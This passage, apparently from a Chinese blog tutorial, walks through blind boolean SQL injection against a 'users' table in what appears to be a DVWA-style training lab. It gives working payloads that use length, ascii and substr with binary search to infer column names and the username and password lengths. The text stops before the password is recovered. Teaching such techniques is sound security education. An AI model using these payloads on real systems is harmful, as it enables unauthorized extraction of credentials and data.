①SELECT first_name, last_name FROM users WHERE user_id = '1' and (select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1)=4#'; |
②SELECT first_name, last_name FROM users WHERE user_id = '1' and (select length(COLUMN_NAME)=4 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1)#'; |
③SELECT first_name, last_name FROM users WHERE user_id = '1' and length((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1))=4#'; |
最终:组合前后端语句的payload:三种 |
①1' and (select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1)=4# |
②1' and (select length(COLUMN_NAME)=4 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1)# |
③1' and length((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1))=4# |
依据二分法,以此类推得出字段名的长度为4;(步骤中没有体现二分法的一一列举,可自行调整“=4”的参数验证) | 确认字段名每一个字符
前端:SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#'; |
后端1: select ascii(substr(COLUMN_NAME,1,1)) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1; |
后端2: select ascii(substr(COLUMN_NAME,1,1))=117 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1; |
后端3: select ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1),1,1))=117; |
组合前后端语句:三种 |
①SELECT first_name, last_name FROM users WHERE user_id = '1' and (select ascii(substr(COLUMN_NAME,1,1)) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1)=117#'; |
②SELECT first_name, last_name FROM users WHERE user_id = '1' and (select ascii(substr(COLUMN_NAME,1,1))=117 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1)#'; |
③SELECT first_name, last_name FROM users WHERE user_id = '1' and ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1),1,1))=117#'; |
最终:组合前后端语句的payload:三种 |
①1' and (select ascii(substr(COLUMN_NAME,1,1)) from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1)=117# |
②1' and (select ascii(substr(COLUMN_NAME,1,1))=117 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1)# |
③1' and ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users' limit 3,1),1,1))=117# |
依据二分法得第一个字符为u,以此类推得出字段名user;(步骤中没有体现二分法的一一列举,可自行调整“=117”的参数验证) |
5.4 爆破数据
5.4.1 用户名的字段值长度
1' and length((select user from users limit 0,1))>10# |
1' and length((select user from users limit 0,1))>5# |
1' and length((select user from users limit 0,1))>3# |
exists |
1' and length((select user from users limit 0,1))>4# |
exists |
1' and length((select user from users limit 0,1))=5# |
exists |
5.4.2 密码的字段值长度
1' and length(substr((select password from users limit 0,1),1))>10# |
exists |
1' and length(substr((select password from users limit 0,1),1))>20# |
exists |
1' and length(substr((select password from users limit 0,1),1))>40# |
1' and length(substr((select password from users limit 0,1),1))>30# |
exists |
1' and length(substr((select password from users limit 0,1),1))>35# |
1' and length(substr((select password from users limit 0,1),1))>33# |
1' and length(substr((select password from users limit 0,1),1))=32# |
exists |
然后继续利用以上方法(ascii + substr)猜出密码就可以了,最终密码为
标签:users,NAME,name,报错,SQL,TABLE,where,select,注入 From: https://www.cnblogs.com/cnblogsfc/p/18463389